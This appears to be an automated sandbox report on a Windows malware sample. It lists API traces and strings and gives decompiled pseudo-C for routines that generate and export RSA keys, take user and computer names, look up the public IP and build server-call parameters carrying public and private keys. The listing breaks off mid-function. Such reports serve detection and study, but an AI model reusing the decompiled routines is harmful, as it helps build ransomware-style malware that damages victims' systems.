Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F5858D0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F585980
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F585999
lstrlenA.KERNEL32(00000000), ref: 0F5859A2
lstrlenA.KERNEL32(?), ref: 0F5859AA
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F5859BB
lstrlenA.KERNEL32(?), ref: 0F5859D5
lstrlenA.KERNEL32(00000000), ref: 0F5859FE
lstrlenA.KERNEL32(?), ref: 0F585A1E

Strings

&id=, xrefs: 0F585AD0
&version=2.3.1r, xrefs: 0F585B7F
&subid=, xrefs: 0F585AE4
&priv_key=, xrefs: 0F585B54
popkadurak, xrefs: 0F585BFE, 0F585C1A
action=call&, xrefs: 0F585A88
&pub_key=, xrefs: 0F585B1D

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
API String ID: 1618292170-4215222798
Opcode ID: ed4d01eab58d5800b8f374295f3d3ace532f31e026151068d10b980563f866e4
Instruction ID: b9584b2a845e0a2e827ca7c1910d1fc0087ab1b871bccb272c95d9676d165f48
Opcode Fuzzy Hash: ed4d01eab58d5800b8f374295f3d3ace532f31e026151068d10b980563f866e4
Instruction Fuzzy Hash: C0F1AC71208301AFD710EF24DC85B6BBBA9FF88725F04092DF585B7291E774A90ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 0F584B20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0F5847D0(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0F582D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0F5848C0(); // executed
					E0F5842B0(_t90, _t106); // executed
					E0F586550( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0F586500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0F584B00(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0F585860(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0F5864C0( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0F584200();
							InitializeCriticalSection(0xf592a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0F583FF0( &_v80);
							} else {
								E0F5841D0(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xf592a48);
							__eflags = E0F583C70();
							if(__eflags != 0) {
								E0F5845B0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0F583DB0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xf592a44;
							if( *0xf592a44 != 0) {
								_t97 =  *0xf592a44; // 0x27c0000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0F583DB0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

0x0f584b2b
0x0f584b31
0x0f584b38
0x0f584b51
0x0f584b57
0x0f584b5e
0x0f584b74
0x0f584b78
0x0f584b7c
0x0f584b7c
0x0f584b82
0x0f584b86
0x0f584b86
0x0f584b8c
0x0f584b91
0x0f584b99
0x0f584b9e
0x0f584ba5
0x0f584bac
0x0f584bb3
0x0f584bcd
0x0f584bd2
0x0f584bd9
0x0f584bea
0x0f584c3b
0x0f584c53
0x0f584c58
0x0f584c5d
0x0f584c6c
0x0f584c5f
0x0f584c64
0x0f584c64
0x0f584c73
0x0f584c78
0x0f584c7d
0x0f584c84
0x0f584c8b
0x0f584c92
0x0f584c99
0x0f584c9d
0x0f584cef
0x0f584cef
0x0f584cf9
0x0f584cff
0x0f584d03
0x0f584d15
0x0f584d05
0x0f584d0b
0x0f584d0b
0x0f584d1f
0x0f584d2a
0x0f584d2c
0x0f584d2e
0x0f584d2e
0x0f584d47
0x0f584d4a
0x0f584d4e
0x0f584d5b
0x0f584d64
0x0f584d74
0x0f584d74
0x0f584d7a
0x0f584d81
0x0f584d89
0x0f584d97
0x0f584d97
0x0f584d9f
0x0f584d9f
0x0f584ca9
0x0f584cbf
0x0f584cd6
0x0f584cdc
0x0f584cde
0x0f584ce8
0x00000000
0x0f584ce8
0x0f584ce2
0x0f584bec
0x0f584c00
0x0f584c03
0x0f584c07
0x0f584c14
0x0f584c1d
0x0f584c2d
0x0f584c2d
0x0f584c35
0x0f584c35
0x0f584bea
0x0f584b3c

APIs

Sleep.KERNEL32(000003E8), ref: 0F584B2B

Part of subcall function 0F5847D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58482C
Part of subcall function 0F5847D0: lstrcpyW.KERNEL32 ref: 0F58484F
Part of subcall function 0F5847D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584856
Part of subcall function 0F5847D0: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58486E
Part of subcall function 0F5847D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58487A
Part of subcall function 0F5847D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584881
Part of subcall function 0F5847D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58489B

ExitProcess.KERNEL32 ref: 0F584B3C
CreateThread.KERNEL32 ref: 0F584B51
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F584B69
TerminateThread.KERNEL32(00000000,00000000), ref: 0F584B7C
CloseHandle.KERNEL32(00000000), ref: 0F584B86
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F584BFA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F584C14
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F584C2D
ExitProcess.KERNEL32 ref: 0F584C35

Strings

open, xrefs: 0F584D90

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: dd0cbba130fb7e83b4753fdc3b36268d457670b9af8aeeef44f642284472b79e
Instruction ID: 17346e7ef18a8b9bef543064817a8e13a219e92cc9ee6d0296a6b9157c0ae95b
Opcode Fuzzy Hash: dd0cbba130fb7e83b4753fdc3b36268d457670b9af8aeeef44f642284472b79e
Instruction Fuzzy Hash: DC711170A4030AFBEB14EBE0DD59FEE7B74BB44712F104025E601BA2C1DBB8694ADB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F5882B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0F5882B0(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

0x0f5882c0
0x0f5882c2
0x0f5882c7
0x0f5882ca
0x0f5882cd
0x0f5882d5
0x0f5883c9
0x0f5883d1
0x0f5882db
0x0f5882db
0x0f5882e0
0x0f5882e0
0x0f5882e3
0x0f5882e8
0x0f5882e9
0x0f5882f5
0x0f5882f5
0x0f5882fb
0x0f588301
0x0f588305
0x0f5883d7
0x0f5883e5
0x0f5883f3
0x0f588313
0x0f588316
0x0f58831e
0x0f588325
0x0f58832c
0x0f588332
0x0f588336
0x0f58833d
0x0f588344
0x0f58834b
0x0f58834f
0x0f588357
0x0f588367
0x0f588367
0x0f58836c
0x0f588374
0x00000000
0x0f588376
0x0f588376
0x0f588377
0x0f588378
0x0f58837f
0x00000000
0x0f588381
0x0f588381
0x0f588385
0x0f588387
0x0f58838a
0x0f588391
0x0f588395
0x0f58839e
0x0f5883a2
0x0f5883a3
0x0f588391
0x0f5883a7
0x0f5883a7
0x0f58837f
0x0f588359
0x0f588359
0x0f58835d
0x0f588365
0x0f5883ae
0x0f5883ae
0x00000000
0x00000000
0x00000000
0x0f588365
0x0f5883b5
0x0f5883c3
0x00000000
0x0f5883c3
0x0f588305

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F5882FB
GetModuleHandleA.KERNEL32(?), ref: 0F58834F
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883D7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5883E5

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0F588367, 0F58836A
Advapi32.dll, xrefs: 0F588359, 0F58835C

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: b4f569f273c729533baaee686f39f774d2f39718d2319693307fb1a54a19ce89
Instruction ID: f01aefa46416bb242e0ac05bfb1871327c79cb5ce4e052b8b584858dac1be2be
Opcode Fuzzy Hash: b4f569f273c729533baaee686f39f774d2f39718d2319693307fb1a54a19ce89
Instruction Fuzzy Hash: 9E314870A00209EBDB109FE4DD85BEEBB78FF04702F544069E601B6280EB389A17DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0F5863E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0F5863E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f5863f4
0x0f5863f8
0x0f586400
0x0f586438
0x0f586446
0x0f58644a
0x0f586452
0x0f586452
0x0f586455
0x0f58646e
0x0f586486
0x0f586490
0x0f58649c
0x0f5864b1
0x00000000
0x0f5864b7
0x0f586402
0x0f58640d
0x00000000
0x0f586431
0x0f58641e
0x0f586426
0x00000000
0x0f58642f
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F584B96,?,0F584B9E), ref: 0F5863F8
GetLastError.KERNEL32(?,0F584B9E), ref: 0F586402
CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F584B9E), ref: 0F58641E
CryptGenKey.ADVAPI32(0F584B9E,0000A400,08000001,?,?,0F584B9E), ref: 0F58644A
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F58646E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F586486
CryptDestroyKey.ADVAPI32(?), ref: 0F586490
CryptReleaseContext.ADVAPI32(0F584B9E,00000000), ref: 0F58649C
CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F5864B1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F5863ED, 0F586413, 0F5864A6

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: 20f1669ca2e543091642e227d390f746c93d75d9fd70526a21cd1632107d1df5
Instruction ID: 77e3b4d4d798aa6039f0574d410643d6e18703d3481dd7951f0722d0fd54af85
Opcode Fuzzy Hash: 20f1669ca2e543091642e227d390f746c93d75d9fd70526a21cd1632107d1df5
Instruction Fuzzy Hash: A9214475780305FBEB20EBA0DE89F9E3B79B748B11F504414F701BB1C0D6B9A915A761

Uniqueness

Uniqueness Score: -1.00%

Function 0F582F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0F582F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x0f582f5a
0x0f582f69
0x0f582f6d
0x0f582f74
0x0f582f76
0x0f582f7b
0x0f582f8d
0x0f582f93
0x0f582f97
0x0f582fa8
0x0f582fac
0x0f582ff2
0x0f582ffa
0x0f583008
0x0f582fae
0x0f582fb1
0x0f582fb3
0x0f582fb8
0x0f582fc0
0x0f582fc5
0x0f582fcf
0x0f582fd7
0x00000000
0x0f582fd9
0x0f582fe3
0x0f582feb
0x0f583011
0x0f583022
0x00000000
0x00000000
0x00000000
0x0f582feb
0x00000000
0x0f582fed
0x0f582fed
0x0f582fee
0x0f582fc0
0x00000000
0x0f582fb8
0x0f582f99
0x0f582f9e
0x0f582f9e
0x0f582f81
0x0f582f81
0x0f582f81
0x00000000

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F582F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F582F8D

Strings

i)w, xrefs: 0F582FE3

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: i)w
API String ID: 4140748134-1280834553
Opcode ID: a52cbff2c27e979b36c29fba00ac919e2c99f034448eca46c93e16e552cefa8c
Instruction ID: b5be798d32ed43a2c8bd127696d2c4888455d0adb587606371de88e77df44b43
Opcode Fuzzy Hash: a52cbff2c27e979b36c29fba00ac919e2c99f034448eca46c93e16e552cefa8c
Instruction Fuzzy Hash: FB21AA32A04219BBEB109E98AD85FE97BBCFB44711F1041A7FE04F6180DB75A9179B90

Uniqueness

Uniqueness Score: -1.00%

Function 0F586FF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0F587E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
Part of subcall function 0F587E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,772966A0,?), ref: 0F58700F
lstrlenW.KERNEL32(0F58FF8C), ref: 0F58701C

Part of subcall function 0F588050: InternetCloseHandle.WININET(?), ref: 0F588063
Part of subcall function 0F588050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F588082

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F58FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F58704B
wsprintfW.USER32 ref: 0F587063
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F58FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F587079
InternetCloseHandle.WININET(?), ref: 0F587087

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0F58703C
GET, xrefs: 0F587024

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: 0c180487e40f81efb48875a502565e08e758f79153bc13230f9dba7b0c1b6f9f
Instruction ID: 0cc39304379ec535d5ec06b0a30b34a82d2ee5a76a94162813642de8c3bf72e4
Opcode Fuzzy Hash: 0c180487e40f81efb48875a502565e08e758f79153bc13230f9dba7b0c1b6f9f
Instruction Fuzzy Hash: F5019235740204BBD6207A75AD4EF9B3F68BB89B62F100035FA05F1181DB68952BD6A5

Uniqueness

Uniqueness Score: -1.00%

Function 0F587490 Relevance: 144.0, APIs: 55, Strings: 27, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0F587490(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
